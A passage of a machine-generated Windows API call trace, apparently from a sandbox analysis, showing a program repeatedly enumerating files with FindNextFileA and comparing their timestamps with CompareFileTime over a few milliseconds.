lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.363] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.363] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.364] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.364] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.365] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.365] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.366] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.366] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.367] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.367] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.368] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.368] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned 1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.369] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.369] FindNextFileA (in: hFindFile=0x63e648, 